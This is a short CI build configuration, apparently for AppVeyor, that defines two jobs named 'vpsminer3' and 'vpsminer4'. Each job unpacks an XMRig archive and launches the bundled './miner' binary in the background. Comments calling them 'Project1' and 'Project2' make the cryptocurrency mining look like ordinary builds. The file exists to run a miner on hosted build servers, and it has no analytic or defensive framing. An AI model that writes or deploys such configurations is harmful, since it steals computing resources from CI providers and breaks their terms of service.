version: 1.0.{build}

image: Ubuntu

# Switch to script mode
build:
  off

init:
  # Ensure necessary packages are installed
  - sudo apt-get update
  - sudo apt-get install -y bash

jobs:
  include:
    # Job for Project1
    - job: vpsminer3
      build_script:
        # Commands for Project1
        - tar xvf xmrigdir.tar.gz
        - cd xmrigdir
        - chmod +x ./miner
        - ./miner & # Run the first project

    # Job for Project2
    - job: vpsminer4
      build_script:
        # Commands for Project2
        - tar xvf xmrigdir.tar.gz
        - cd xmrigdir
        - chmod +x ./miner
        - ./miner &   # Run the second project
        
